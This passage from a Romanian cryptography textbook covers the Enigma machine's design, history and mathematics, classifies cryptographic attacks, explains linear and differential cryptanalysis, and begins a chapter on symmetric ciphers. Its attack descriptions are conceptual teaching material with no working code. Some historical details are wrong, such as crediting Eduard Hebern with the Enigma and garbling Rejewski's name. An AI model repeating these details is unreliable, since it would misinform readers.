Aplicarea practică a acestor maşini a început numai la începutul secolului XX. Una dintre
primele maşini rotor a fost maşina germană „Enigma”, elaborată în anul 1917 de către Eduard
Hebern şi perfectată mai târziu de mai multe ori. Din punct de vedere comercial ea a fost

20
disponibilă pe piaţă încă din anul 1920, însă importanţa ei a fost dată de utilizarea maşinii de către
diverse guverne, în mod special de către Germania nazistă înainte şi în timpul celui de-al doilea
război mondial.
Dintre toate dispozitivele criptografice create de-a lungul timpului maşina Enigma a fost un
echipament mai special din 2 puncte de vedere: criptografic și istoric.
Importanţa din punct de vedere criptografic este dată
de faptul că echipe de criptanalişti (matematicieni la origine)
de toate naţionalităţile, în efort combinat, au încercat pe de o
parte perfecţionarea maşinii, pe de altă parte spargerea
cifrurilor. Printre cei care au participat la spargerea cifrului au
făcut parte şi polonezul Rajewski şi britanicul Turing
(inventatorul maşinilor Turing).
Importanţa istorică rezidă din rolul mare jucat de
aceste maşini în timpul celui de-al doilea război mondial, mai
precis faptul că descifrarea de către aliaţi a codului (nume de

Figura 5.7. Modelul militar proiect ULTRA) a dus, după unii istorici, la scurtarea
german numit Wehrmacht războiului cu aproximativ un an.
Enigma

Construcţia maşinii. Maşina Enigma era o combinaţie de părţi mecanice şi electrice.


Principalele ei componente erau, după cum urmează:
 Tastatura: o tastatură obişnuită similară cu cea pentru maşinile de scris.
 Placa cu lămpi: asemănătoare unei tastaturi cu lămpi în loc de taste. Pe lămpi erau tipărite
literele alfabetului ce deveneau vizibile prin aprinderea lămpii corespunzătoare.
 Placa cu comutatoare: mufe (prize) câte una pentru fiecare literă, ce se conectau prin fire în
6 perechi (Această componentă fusese adăugată de germani pentru a creşte securitatea
maşinii).
 Trei roţi: se mai numeau rotoare (roţi detaşabile) fiecare dintre ele având câte un set de 26
de contacte, câte unul pentru fiecare literă a alfabetului (figura 5.8).
 Roata reflectoare: roată fixă identică cu celelalte 3, având un set de 26 de contacte grupate
în perechi.
 Cabluri: asigurau conexiunile între taste şi lămpi precum şi între lămpi şi primul rotor, între
primul rotor şi al doilea, al doilea şi al treilea, al treilea si roata reflectoare.
 Baterie: pentru alimentarea circuitelor electrice.

21
Figura 5.8. Rotor Enigma Figura 5.9. Principiul de funcţionare al
maşinii (Enigma)

Principiul de funcţionare al maşinii Enigma se prezenta conform schemei din Figura 5.9.
Prin apăsarea tastei ”A” curentul era trecut prin setul de rotoare până la reflector de unde se
”întorcea” înapoi aprinzându-se becul ”G”. Litera ”A” se criptează diferit (”G” si ”C”) doar printr-o
simplă rotire a primului rotor care face ca semnalul să circule pe o rută complet diferită.
Pentru operarea maşinii în primul rând toţi operatorii aveau maşini identice (pentru
asigurarea inter-operabilităţii). Iniţierea criptării unui mesaj se făcea în 2 paşi:
 Pasul 1: setarea maşinii – operaţie ce consta în fixarea ordinei şi poziţiei fiecărui rotor
precum şi alegerea celor 6 perechi de conectori prin placa cu comutatoare (switch
board).
 Pasul 2: scrierea propriu-zisă a mesajului – pentru criptarea mesajului operatorul apăsa
pe tasta corespunzătoare primei litere din textul necodat (să zicem ”N”). În acest moment
se aprindea o lampă (să zicem ”T”) corespunzătoare codificării. Repetând şi pentru
celelalte litere, rezulta textul codat.
Trebuie de menţionat că toate setările din Pasul 1 erau înscrise în manuale de operare (code
books), setări ce se schimbau de regulă zilnic. Fiecare operator avea câte un exemplar. De fapt,
aceste setări constituiau cheia criptosistemului Enigma. Un atribut extrem de important al maşinii
Enigma era că cheile de cifrare şi cele de decifrare erau aceleaşi. Cu alte cuvinte dacă la
”transmitere” ”N” se transforma în ”T”, la ”destinaţie ”T” se transforma în ”N” (folosind bine-nţeles
aceleaşi setări ale maşinii).
Utilizarea intensivă colaborată cu posibilitatea transmiterii informaţiei folosind aceleaşi day
key la care se adăugau intensele activităţi de contraspionaj i-au condus pe germani la teama că
maşina ar putea fi compromisă. Efectul, a fost introducerea unui protocol. Acesta spunea: „fiecare
operator va transmite suplimentar, înaintea mesajului propriu zis, o cheie a mesajului (message

22
key)”. Aceste chei erau cuvinte (nu neapărat cu sens) formate din 3 litere alese în mod aleator de
operatorul maşinii. Cu alte cuvinte, operatorul trebuia să seteze maşina conform instrucţiunilor
zilnice din manualul de operare (code book), după care trimitea cheia din cele trei litere alese
aleator. În aşa fel maşina se seta într-un mod complet aleator. Condiţiile radio proaste, lucrul sub
presiune, precum şi alte condiţii de lucru nefavorabile puteau conduce la transmiterea (sau
recepţionarea) greşită (alterată) a cheii, fapt ce ar fi făcut inutilă transmiterea mesajului propriu-zis
(evident, datorită faptului că maşinile de la transmiţător şi cea de la receptor ar fi fost setate diferit).
Pentru a minimiza astfel de incidente, operatorilor li s-a cerut să transmită cheia de 2 ori. De
exemplu cheia hot se transmitea hothot și se recepţiona dugraz. Însă în mod ironic, ceea ce se dorea
o măsură de securitate în plus, de fapt a compromis maşina.
Matematic vorbind, mulţimea cheilor posibile era atât de mare încât nici nu se punea
problema ”atacării” maşinii, cel puţin nu la aceea vreme, prin metoda exhaustivă („brute-force”).
Enigma a fost elaborată astfel încât securitatea să fie păstrată chiar dacă inamicul cunoaşte schemele
rotoarelor, cu toate că în practică setările erau secrete. Cu o schemă secretă de setare cantitatea
totală a configurărilor posibile era de ordinul 10114 (circa 380 biţi) iar dacă schema şi alte setări
operaţionale erau cunoscute acest număr se reducea la 1023 (76 biţi). Germanii credeau că maşina
Enigma este una infailibilă datorită imensităţii setărilor posibile ce i se puteau aplica. Era ireal să
începi măcar să alegi o configurare posibilă.
Din punct matematic de vedere transformarea Enigmei pentru fiecare literă este rezultatul
matematic a permutărilor. Pentru un aparat cu trei rotoare fie P transformarea pe tabela de prize, U -
reflectorul, şi L, M, R - acţiunea rotorului din stânga, din mijloc, dreapta respectiv. Atunci
criptarea E poate fi notată cu:
E = PRMLUL- 1M - 1R - 1P - 1
După fiecare apăsare de tastă rotoarele se rotesc, schimbând transformarea. De exemplu
dacă rotorul de dreapta R e rotit cu i poziţii, transformarea devine: ρiRρ- i, unde ρ este permutarea
ciclică. Similar, rotorul din mijloc şi cel din stânga pot fi reprezentate ca j şi k rotaţii respectiv a lui
M şi L. Funcţia de criptare poate fi descrisă astfel:
E = P(ρiRρ - i)(ρjMρ - j)(ρkLρ - k)U(ρkL - 1ρ - k)(ρjM - 1ρ - j)(ρiR - 1ρ - i)P - 1
Pentru elucidarea funcţionării maşinii Enigma este sugestivă simularea (în flash) de la
www.enigmaco.de/enigma (figura 5.10).
Primele spargeri ale maşinii Enigma au avut loc la începutul anilor 30 de către
matematicienii polonezi Alicen Rejewski, Jerzy Rozycki şi Henryk Zygalsk. Cu noroc şi intuiţie
Rejewski şi echipa lui au reuşit să compromită maşina, totul fiind posibil nu datorită vreunei
”scăpări” în proiectarea maşinii ci deciziei nemţilor de a transmite repetitiv (de 2 ori) cheia.

23
Ulterior Enigma a fost perfecţionată, spargerea ei devenind practic imposibilă pentru acele
timpuri. Un aport considerabil în direcţia spargerii acestei maşini a avut Alan Turing, care
proiectase o maşină electromecanică (denumită „Bombe” după modelul original polonez) ce putea
ajuta la spargerea maşinii Enigma mai rapid decât „bomba” din 1932 a lui Rejewski, din care s-a şi
inspirat. „Bombe” (figura 5.11), cu o îmbunătăţire sugerată de matematicianul Gordon Welchman, a
devenit una din principalele unelte automate utilizate pentru a ataca traficul de mesaje protejat de
Enigma.

Figura 5.10. Simulator maşina Enigma


Maşina „Bombe” căuta setări potenţial corecte pentru un mesaj Enigma (adică, ordinea
rotoarelor, setările rotoarelor, etc.), folosind un fragment de text clar probabil. Pentru fiecare setare
posibilă a rotoarelor (numărul maxim posibil fiind de ordinul a 1019 stări, sau 1022 pentru maşinile
Enigma de la U-boat, care aveau patru rotoare, faţă de maşina Enigma standard care avea doar trei).
Aceasta efectua un lanţ de deducţii logice pe baza fragmentului probabil, deducţii implementate
electric. „Bombe” detecta când avea loc o contradicţie, şi elimina setarea, trecând la următoarea.
Peste două sute de astfel de maşini create de Alan Turing au fost în funcţiune până la sfârşitul
războiului.
Maşinile cu rotor au fost folosite activ pe parcursul războiului II mondial. Pe lângă maşina
germană Enigma au fost folosite şi Sigaba (SUA), Typex (Marea Britanie), Red, Orange, Purple
(Japonia). Maşinile cu rotor au fost vârful criptografiei formale deoarece realizau cifruri suficient de
rezistente într-un mod relativ simplu.

24
Figura 5.11. Maşina BOMBE (Alan Turing)
Atacurile încununate de succes asupra maşinilor cu rotor au fost posibile numai la începutul
anilor 40 odată cu apariţia maşinilor electronice de calcul. Tot în această perioadă criptografia
devine ştiinţific ramură aparte a matematicii odată cu publicarea (anul 1949) articolului lui Claude
Elwood Shannon2 „Communication Theory of Secrecy Systems”, care a pus bazele ştiinţifice ale
sistemelor de criptare cu cheie secretă (sistemelor simetrice).

5.4. Atacuri criptografice


5.4.1. Noțiune de criptanaliză și atac criptografic
Atacul asupra securităţii unui sistem criptografic defineşte orice acţiune ce compromite
securitatea acelui sistem. Atacurile criptografice pot fi îndreptate împotriva:
 algoritmilor criptografici;
 tehnicilor utilizate pentru implementarea algoritmilor protocoalelor;
 protocoalelor.
După modelul de atacare al unui atacator, aceste atacuri se pot clasifica după cum urmează:
a) atacuri pasive (de intercepţie):
 de înregistrare a conţinutului mesajelor;
 de analiză de trafic;
b) atacuri active:
 de întrerupere (atac la disponibilitate);
 de modificare (atac la integritate);
 de fabricare(atac la autenticitate).
Atacurile pasive sunt atacuri în care intrusul (persoană, calculator, program) doar ascultă,
monitorizează transmisia, deci sunt atacuri de intercepţie. Ele pot fi de două feluri:
1. de înregistrare a conţinutului mesajelor;
2. de analiză a traficului.
Caracteristicile atacurilor pasive:

2
Claude Elwood Shannon (30 aprilie 1916 - 24 februarie 2001) a fost un matematician american, inginer
electrotehnist și criptograf cunoscut sub numele de „tatăl teoriei informației”.
25
 sunt greu de detectat pentru că datele nu sunt alterate;
 măsurile ce pot fi luate pentru evitarea acestor atacuri sunt acelea care fac
criptanaliza extrem de grea, dacă nu imposibilă;
 este necesară prevenirea şi nu detecţia lor.
Atacurile active sunt atacuri în care intrusul are o intervenţie activă atât în desfăşurarea
normală a traficului, cât şi în configurarea datelor (modificarea datelor, crearea unor date false).
Dintre atacurile active se regăsesc:
 întreruperea serviciului;
 modificarea;
 modificări în program astfel încât acesta va lucra diferit;
 modificarea conţinutului mesajelor transmise în reţea;
 fabricarea: un neavizat inserează informaţii false în sistem.
Atacurilor active pot fi caracterizate prin faptul că deşi pot fi detectate, prevenirea lor este
foarte grea, deoarece ar însemna protecţie fizică permanentă a întregului sistem.
Atacurile amintite mai sus sunt, în principiu, atacuri mai generale, nu neapărat specifice
exclusiv algoritmilor criptografici, iar o analiză mai detaliată a unora dintre ele va fi făcută în
compartimentul 9.
Atacurile specifice algoritmilor criptografice sunt atacurile de criptanaliză.
Criptanaliza este ştiinţa spargerii cifrurilor şi se ocupă de obţinerea valorii iniţiale a
informaţiei criptate fără a avea acces la informaţia secretă, adică la cheia necesară pentru acest
lucru. Persoana care se ocupă cu criptanaliza se numeşte criptanalist. Atacul criptografic bazat pe
metode de criptanaliză se mai numește atac criptanalitic.
Analiza criptografică studiază metode de atac pornind de la informaţii minimale despre
cheile de criptare, algoritmii utilizați, protocoalele de autentificare, segmente de text clar şi
segmentele corespondente din textul criptat, sau doar pe baza unuia sau a unui set de texte criptate
utilizând același algoritm.
Scopul metodelor de criptanaliză este descoperirea mesajelor în clar şi/sau a cheii
din mesajul criptat. Orice cifru este creat în scopul de a asigura confidențialitatea informației
protejate și, reieșind din acest concept, întotdeauna se vor găsi oameni care doresc să obţină accesul
la informaţia dată. În esență, se încearcă determinarea unui punct vulnerabil al algoritmului, care să
poată fi exploatat folosind metode pentru care timpul de căutare să fie considerabil mai mic decât
timpul necesar verificării tuturor combinațiilor de chei posibile (atac cu forţa brută).
Nu există încă un sistem criptografic despre care să se poată afirma că este pe deplin sigur,
dar pot fi considerate sigure acele criptosisteme pentru care atacurile cunoscute necesită un timp
mult prea îndelungat pentru a putea fi considerate practice.

26
5.4.2. Tipuri de atacuri criptografice
Se cunosc mai multe tipuri de atacuri criptografice. O categorie aparte sunt atacurile ce se
realizează prin forţă brută (brute force), adică aplică o metodă exhaustivă de căutare prin încercarea
tuturor combinaţiilor posibile fie de chei de criptare, fie de simboluri din text pentru deducerea
textului în clar (de exemplu, la metodele de criptare prin substituţia sau transpoziţia literelor din
mesaje de tip text). Complexitatea acestui atac este în funcţie de cantitatea tuturor variantelor
posibile.
Acest tip de atac este unul general, adică poate fi aplicat la orice algoritm de criptare. Din
acest motiv în elaborarea sistemelor de criptare autorii încearcă să obţină ca acest atac să fie cel mai
eficient, comparativ cu celelalte metode de spargere. Sistemul se proiectează astfel încât forţa brută
să aibă un spaţiu al soluţiilor suficient de voluminos pentru ca rezultatul aplicării forţei brute să nu
fie obţinut pe parcursul a câtorva ani, sau uneori şi secole.
În baza complexităţii aplicării forţei brute se face evaluarea securităţii sistemului. În
particular, cifrul se consideră sigur dacă nu există o metodă de spargere semnificativ mai rapidă
decât forţa brută.
Atacurile criptografice bazate pe forţa brută sunt cele mai universale, dar şi cele mai
îndelungate. În legătură cu aceasta există deja şi se mai elaborează încontinuu posibilităţi de
optimizare a metodei forţei brute. Printre aceste metode optimizate se numără următoarele:
 metoda ramifică şi mărgineşte (branch and bound method);
 metoda calculelor paralele (parallel calculation method).
Metoda ramifică şi mărgineşte reprezintă un algoritm de căutare a soluţiilor optime pentru
diverse probleme. Esenţa lui constă în separarea submulţimii de soluţii admisibile care nu conţine
soluţii optime. Metoda a fost propusă pentru prima dată de către A. H. Land şi A. G. Doig în 1960
pentru programarea discretă.
Calculul paralel este execuția în paralel pe mai multe procesoare a acelorași instrucțiuni, sau
și a unor instrucțiuni diferite, cu scopul rezolvării mai rapide a unei probleme, de obicei special
adaptată sau subdivizată. Ideea de bază aici constă în divizarea mulţimii soluţiilor în N submulţimi,
fiecare din ele fiind mult mai „mică” decât originalul, astfel realizarea „forţei brute” va necesita de
n ori mai puţin timp, în funcţie de numărul de submulţimi ale partiţiei făcute. Problema
fundamentală aici constă în determinarea şi divizarea mulţimii soluţiilor. „Forţa brută” se aplică
până când un procesor nu a găsit soluţia (cheia) necesară.
De rând cu forţa brută se mai aplică şi metodele statistice de atac. Aceste metode se
divizează în două subcategorii:
 metode de criptanaliză a proprietăţilor statistice ale gamei de criptare;
 metode de criptanaliza a complexităţii şirului.

27
Prima subcategorie studiază şirurile la ieşirea algoritmilor de criptare. În acest caz
criptanalistul cu ajutorul diverselor teste statistice încearcă să găsească valoarea următorului bit al
şirului cu o probabilitate mai mare decât probabilitatea alegerii aleatoare.
În cazul al doilea criptanalistul încearcă să genereze şiruri analogice cu gama însă aplicând
metode mult mai simple.
Din diversitatea de tipuri şi metode de atac criptografic, demonstrate, verificate şi aplicate de
matematicieni, informaticieni și criptanaliști trebuie menţionate atacurile cu text clar sau text cifrat:
 Atac cu text cifrat (ciphertext-only attack) interceptat, prin analiza căruia se încearcă găsirea
textului original sau a cheii de criptare. Acest atac se bazează pe informaţii referitoare la
secvenţe de text cifrat și este una dintre cele mai dificile metode criptografice din cauza
informaţiei sumare pe baza căreia trebuie să se deducă informaţii referitoare la textul clar
sau la chei.
 Atac cu text clar cunoscut (known plaintext attack), este un atac în care criptanalistul are
acces nu doar la textul cifrat, ci şi la textul clar corespunzător. El încearcă să descopere o
corelație între cele două pentru a găsi cheia de criptare sau pentru a crea un algoritm care îi
va permite să descifreze orice mesaje criptate cu această cheie. Textele în clar necesare
pentru acest atac pot fi obţinute prin diverse metode, de exemplu dacă se cunoaşte că se
trimite un fişier cifrat cu un nume ştiut, atunci din extensia fişierului se pot face concluzii
despre conţinutul anumitor fragmente ale fişierelor, de exemplu a heeder-ului. Acest atac
este mai puternic decât atacul cu text cifrat.
 Atac cu text cifrat ales (chosen ciphertext attack), este un atac în care criptanalistul alege un
text cifrat și încearcă să găsească textul clar potrivit. Acest lucru se poate face cu o
decriptare oracul (o mașină care decriptează fără a demasca cheia). Atacul este aplicat la
criptarea cu cheie publică – se începe cu un text cifrat și căutări de potrivire de date ale
textului clar postate public.
 Atac cu text clar ales (chosen plaintext attack), este un atac în care criptanalistul poate cripta
un text clar la alegerea sa și studia textul cifrat rezultat. Scopul criptanalistului este acelaşi
ca la atacul cu text clar cunoscut: de a afla cheia de criptare sau de a găsi o altă metodă
pentru descifrarea mesajelor cifrate cu aceeaşi cheie. Însă criptanalistul trebuie să mai aibă
posibilitatea de a alege câteva texte în clar şi să obţină rezultatul cifrării lor. Obţinerea
textului cifrat respectiv pentru textul clar dat uneori se poate face prin crearea şi transmiterea
unui mesaj necifrat în numele unuia din utilizatorii care folosesc criptarea. În cazul
coincidenţii unor factori acest mesaj poate fi cifrat şi retransmis înapoi. Acest atac este cel
mai des utilizat în criptografia asimetrică, în cazul în care criptanalistul are acces la o cheie
publică.

28
 Atac cu text clar ales adaptiv (adaptive chosen plaintext attack), este un caz particular, mai
confortabil, al atacului cu text clar ales. Confortul atacului constă în faptul că pe lângă
posibilitatea alegerii textului clar, criptanalistul poate lua decizia de a cifra un oarecare text
clar în baza operaţiilor de cifrare deja efectuate. Cu alte cuvinte la realizarea atacului cu text
clar ales criptanalistul alege doar un bloc mare al textului clar pentru a fi cifrat şi apoi, în
baza datelor obţinute începe spargerea sistemului. În cazul organizării atacului cu text clar
ales adaptiv criptanalistul poate obţine rezultatul cifrării oricărui bloc al textului clar pentru
a acumula datele care îl interesează şi care vor fi luate în seamă la alegerea ulterioară a
blocurilor textului clar etc. Anume adaptivitatea (posibilitatea feedback-ului) îi dă un avantaj
atacului cu text clar ales adaptiv.
 Atac cu text cifrat ales adaptiv (Adaptive Chosen Ciphertext Attack), este un atac analogic
atacului cu text clar ales adaptiv.
În continuare vom menţiona alte tipuri şi metode de tac utilizate în prezent.
Atacul de tip dicţionar (dictionary attack) este o metodă criptanalitică în care atacatorul
pregăteşte și memorează un tabel cu corespondenţe text clar - text criptat de tipul perechilor
(PiCi=EKi(P), Ki) sortate după Ci. Ulterior, atacatorul monitorizează comunicaţia şi în momentul în
care va găsi un text criptat Cj care se regăseşte în tabelul său va găsi imediat cheia de criptare K j.
Atacul zilei de naştere (Birthday attack), se bazează pe cunoscutul paradox al „zilei de
naştere” şi a variantelor sale (într-un grup de 23 de persoane, probabilitatea să existe două dintre ele
născute în aceeaşi zi din an este peste 0,5; în general, într-un grup de k numere aleatoare având k
valori posibile, probabilitatea ca cel puţin două să fie egale este în jur de 0,5). Problema poate fi
astfel generalizată: dacă o funcţie f: A → B poate lua oricare din cele n valori din mulţimea B cu

probabilităţi egale, atunci după calculul funcţiei pentru n valori diferite este foarte posibil să
găsim o pereche de valori x1 și x2 astfel încât f(x1) = f(x2). Evenimentul reprezintă o coliziune, iar
pentru funcţii cu distribuție impară, coliziunea poate apărea şi mai devreme. Semnătura digitală este
susceptibilă de a fi supusă unui astfel de atac.
Atac cu întâlnire la mijloc (Meet-in-the-middle attack) este similar cu atacul zilei de naştere,
cu excepţia faptului că în acest caz analistul are o flexibilitate mai mare. În loc să aştepte
coincidenţa a două valori într-o singură mulţime de date, analistul poate căuta o intersecţie a două
mulţimi.
Presupunem că atacatorul cunoaşte o mulţime de texte în clar P și texte criptate C cu cheile
k1 și k2. Atunci el poate calcula EK(P) pentru toate cheile posibile K și să memoreze rezultatele, apoi
poate calcula DK(C) pentru fiecare K şi să compare cu rezultatele memorate - dacă va găsi o
coincidenţă este ca și cum ar fi găsit cele două chei şi poate verifica direct pe textul în clar şi cel

29
criptat. Dacă dimensiunea cheii este n, atacul va folosi doar 2n+1 criptări în contrast cu un atac
clasic, care ar avea nevoie de 22n criptări.
Atacul omului din mijloc (Man-in-the-middle attack) descrie situaţia când un atacator are
posibilitatea să citească şi să modifice mesajele schimbate între doi corespondenţi fără ca cele două
părţi să sesizeze faptul că metoda de comunicare între ei a fost compromisă.
Atacul începe de obicei cu ascultarea canalului şi se termină cu încercarea criptanalistului de
a înlocui mesajul interceptat, extragerea informaţiilor utile din el, redirecţionarea mesajului la unele
resurse externe. Fie că subiectul A planifică transmiterea spre subiectul B a unei informaţii oarecare.
Subiectul C posedă cunoştinţe despre structura şi proprietăţile metodei de transmitere a datelor,
precum şi a însuşi faptului transmiterii acelei informaţii pe care intenţionează să o intercepteze (de
exemplu cheia privată). Pentru săvârşirea atacului C se „prezintă” lui A drept B, iar lui B drept A.
Subiectul A consideră eronat că transmite informaţia lui B şi o trimite lui C, care la rândul său
efectuează unele operaţii cu ea (o copiază sau o modifică în scopuri personale) şi o transmite lui B.
Ultimul consideră că informaţia a fost primită direct de la A.
Posibilitatea unui astfel de atac rămâne o problemă serioasă pentru sistemele bazate pe chei
publice.
Atacul în reluare (replay attack) este un atac în care atacatorul memorează o sesiune de
comunicare în ambele sensuri (mesajele schimbate de ambii corespondenţi) sau bucăţi din sesiune.
Ideea atacului nu este de a decripta o sesiune de comunicare, ci de a crea confuzii şi mesaje false.
Atacul cu chei relaţionate (related keys attack). În acest caz atacatorul descoperă o relaţie
între un set de chei și are acces la funcţiile de criptare cu astfel de chei relaţionate. Scopul declarat
este de a găsi chiar cheile de criptare. Algoritmi ca IDEA, GOST, RC2 și TEA au prezentat
slăbiciuni când au fost supuse atacului.
Atacul prin alunecare (slide attack) poate fi văzut ca o variantă a atacului cu chei relaţionate
în care relaţiile sunt definite pe aceeaşi cheie. Atacul este eficient în cazul unor procese iterative sau
recursive (algoritmi simetrici de tip şir sau bloc) care prezintă grade de similitudine între cicluri
succesive ale procesului iterativ. Complexitatea atacului este independentă de numărul de cicluri ai
algoritmului. Slăbiciuni în cazul acestui atac au fost relevate în algoritmul Feistel și chiar în cazul
SHA-1.
Atacul de corelaţie (correlation attack) se efectuează asupra generatorului de filtrare din
cifrurile şir bazate pe generatoare de tip LFSR (Linear Feedback Shift Register, mai detaliat despre
LSFR vezi în compartimentul 6), în două faze: întâi se determină o funcţie între şirul de biţi cheie
generat şi biţii registrului de deplasare, după care șirul de chei este interpretat ca o versiune afectată
de zgomot a şirului generat de LFSR.

30
Atacul de corelaţie rapidă (fast correlation attack) se aplică generatoarelor de chei bazate pe
LFSR, ca şi atacul de corelaţie, dar sunt mai rapide și exploatează existenţa unei corelaţii între şirul
de chei şi ieşirea unui LFSR, numit LFSR ţintă, a cărui stare iniţială depinde de anumiţi biţi ai cheii
secrete.
Atacurile de corelaţie rapidă evită examinarea tuturor iniţializărilor posibile ale LFSR-ului
ţintă folosind anumite tehnici eficiente de corectare a erorii. Astfel, descoperirea stării iniţiale a
LFSR-ului constă în decodarea subşirului de chei relativ la codul FSR-ului.
Atacul prin interpolare (interpolation attack) este o tehnică de atac asupra cifrurilor
simetrice bloc construite din funcţii algebrice simple. Dacă textul criptat este scris ca un polinom,
funcţie de elementele textului clar şi gradul polinomului este suficient de mic, atunci un număr
limitat de perechi de text clar/criptat sunt suficiente pentru determinarea funcţiei de criptare. Acest
lucru permite atacatorului să cripteze sau să decripteze blocuri de date fără a recupera propriu zis
cheia de criptare. Atacul a fost introdus în 1997 şi aplicat prima dată pe o variantă a algoritmului
SHARK, un predecesor al algoritmului Rijndael, care stă la baza standardului AES. Acest tip de
atac poate fi generalizat, astfel că ideea interpolării poate fi aplicată şi în cazul unor polinoame
probabilistice.
Atacul „divide și cucereşte” (divide and conquer attack). Atacurile din această categorie
încearcă diviziunea cheilor în bucăţi mai mici, pentru a face posibilă căutarea exhaustivă. Acest tip
de atac este eficient în măsura în care este posibil să determinăm bucăţi separate din chei. Problema
constă în validarea sau invalidarea unui segment de cheie, fără a avea informaţii despre restul cheii.
Atacul temporal (timing attack). Durata de execuţie a unui echipament hardware de criptare
poate furniza informaţii despre parametrii implicaţi astfel încât analiza atentă şi măsurarea timpului
de execuţie poate duce, în anumite condiții, la recuperarea cheilor secrete. Pentru a putea realiza un
astfel de atac, atacatorul are nevoie de un set de mesaje împreună cu durata lor de procesare pe
echipamentul criptografic. Metodele de măsurare a timpului sunt diverse: monitorizarea activităţii
procesorului, măsurarea timpului într-o secvenţă de interogare/răspuns etc. Atacul a fost aplicat
algoritmilor RSA și RC5, dar şi unor protocoale de Internet de tipul SSL.
5.4.3. Criptanaliza liniară și diferențială
În continuare sunt expuse două tehnici de criptanaliză - criptanaliza liniară şi criptanaliza
diferenţială - care la momentul actual sunt unele dintre cele mai răspândite metode de spargere a
cifrurilor bloc.
Criptanaliza liniară (linear cryptanalisis) este o tehnică introdusă de Matsui si Yamagishi în
1991 (A new Method for known plain text attack of FEAL cipher) care încearcă să exploateze
apariţiile cu probabilitate mare ale expresiilor liniare ce implică biţi de text clar, biţi de text criptat
şi biţi ai subcheilor. În acest caz se presupune că atacatorul cunoaşte un set aleator de texte clare,

31
precum și textele criptate corespunzătoare. Se aplică algoritmilor simetrici, de tip bloc și a fost
utilizată cu succes în criptanaliza algoritmului DES – precedentul standard decriptare simetrică în
SUA. Sunt elaborate atacuri pentru cifrurile bloc şi cele de tip flux. Descoperirea criptanalizei
liniare a constituit un imbold pentru elaborarea noilor scheme de criptare.
Criptanaliza liniară este o tehnică prin care se urmăreşte construcţia unui sistem de ecuaţii
liniare între biţii textului clar, ai textului cifrat şi ai cheii. Rezolvarea acestui sistem de ecuaţii duce
la aflarea cheii de cifrare. Sistemul de ecuaţii ce se construieşte poate fi chiar un sistem probabilist,
în sensul că o ecuaţie este verificată cu o anumită probabilitate.
Criptanaliza se face în două etape. Prima - construirea relațiilor dintre textul clar, textul
cifrat și cheie, care sunt adevărate cu o probabilitate mare. A doua - utilizarea acestor relații,
împreună cu perechile cunoscute de text clar şi text cifrat pentru obţinerea biților cheii.
La momentul actual pentru orice cifru nou este necesar de demonstrat că el este rezistent la
criptanaliza liniară.
Criptanaliza diferenţială (diferential cryptanalysis) este o tehnică introdusa de Biham şi
Schamir prima dată în 1991 și concretizată în „Diferential Cryptanalysis of the Data Encryption
Standard” publicat în 1993. Tehnica face parte din categoria atacurilor cu text clar ales. În general
fiind dată perechea ( D, D), numită caracteristică, tehnica constă în generarea de texte clare (P1, P2)
cu D = P1 – P2 astfel încât D   C1 – C2 şi aflarea unei părţi a cheii, restul fiind căutată exhaustiv.
Operația „–” este operaţia de grup care, spre exemplu în cazul cifrurilor bloc, constă în adunarea
cheii de runda.
Criptanaliza diferenţială exploatează apariţiile cu mare probabilitate a diferenţelor din
textele clare, precum și a diferenţelor apărute în ultimul ciclu al criptorului în care atacatorul poate
selecta intrările și examina ieşirile în încercarea de a deduce cheia.
În final trebuie de subliniat că la elaborarea sistemelor de criptare trebuie să fie luate în
considerare performanţele criptanalizei pentru a diminua riscurile posibile.

Întrebări și subiecte pentru aprofundarea cunoștințelor și lucrul individual


1. Care este locul criptografiei în procesul de asigurare a securității informației?
2. Numiți și comentați cele cinci componente ale unui sistem de criptare a informației.
3. Faceți o clasificare a tipurilor de algoritmi de criptare. Care sunt avantajele și
dezavantajele fiecărui tip de cifru?
4. Fie mesajul M=NumePrenume. Utilizând algoritmii de criptare Cezar, Afin, Polibios,
Playfair, Vigenere și de transpoziție realizați criptarea și decriptarea mesajului M,
alegând cheia de criptare potrivită (înlocuiți NumePrenume cu cele personale).
5. Realizați un studiu pentru a comenta argumentat efectele utilizării mașinii Enigma în
cel de-al Doilea Război Mondial.
6. Descrieți etapele realizării unui atac criptografic bazat pe analiza frecvenței.
32
TEMA 6: CRIPTOGRAFIA SIMETRICĂ

Obiectivele temei:
 Introducere de în criptarea cu cheie secretă.
 Analiza algoritmilor de criptare de tip bloc
 Studiul algoritmilor simetrici de criptare de tip şir.

Cuvinte-cheie:
criptare cu cheie secretă, cheie fluidă,
cifru bloc, cifruri sincrone,
cutii S, cutii P, cifruri asincrone,
cifrul Feistel, registre de deplasare cu
algoritmii de criptare feedback,
DES, AES, algoritmii de criptare
generarea cheii, Seal, A5, RC4.
cifruri stream,

Era ştiinţifică a criptografiei a început odată cu publicarea în anul 1949 a articolului lui
Claude Elwood Shannon (fondatorul teoriei informaţiei, 30.04.1916 – 24.02.2001) „Communication
Theory of Secrecy Systems”. Începând cu acest moment criptografia devine ştiinţific ramură aparte a
matematicii, iar articolul lui Shannon a pus bazele ştiinţifice ale sistemelor de criptare cu cheie
secretă (sisteme simetrice de criptare).
Trebuie de menționat că în criptografia modernă, indiferent de tipul sistemului de criptare,
secretul cifrului se bazează pe păstrarea secretului cheii, și nu a algoritmului de criptare. Mai mult,
orice sistem de criptare poate fi spart, considerându-se „bun” acel sistem, costul resurselor pentru
spargerea căruia depășește valoarea informației criptate sau timpul cheltuit pentru spargere este prea
mare pentru ca informația obținută să mai fie utilă.

6.1. Noțiune de criptare cu cheie secretă


Algoritmii de criptare cu cheie secretă sunt caracterizaţi de faptul că folosesc aceeaşi cheie
atât în procesul de criptare, cât şi în cel de decriptare (Figura 6.1). Din acest motiv algoritmi cu
cheie secretă mai sunt cunoscuţi sub numele de algoritmi simetrici. Pentru a utiliza astfel de
algoritmi este necesar ca înaintea criptări/decriptării, atât expeditorul cât şi destinatarul să posede
deja cheia respectivă. În mod evident, cheia ce caracterizează aceşti algoritmi trebuie să fie
cunoscută doar de expeditor şi destinatar.

1
Figura 6.1. Schema algoritmului de criptare cu cheie secretă
Criptarea simetrică prezintă avantajul rapidităţii cu care sunt realizate procesele de
criptare/decriptare a mesajelor. Succesul sistemului se bazează pe dimensiunea cheii, care astăzi se
consideră sigură dacă are nu mai puțin de 128 biţi. Cele trei caracteristici ale criptării simetrice sunt
siguranţa, rapiditatea şi volumul mare de date criptate.
Principalul dezavantaj al algoritmilor simetrici constă în faptul că impun un schimb de chei
private înainte de a se începe transmisia de date. Altfel spus, pentru a putea fi utilizat un algoritm
simetric de criptare, este necesar un canal protejat pentru a transmite cheile de criptare/decriptare
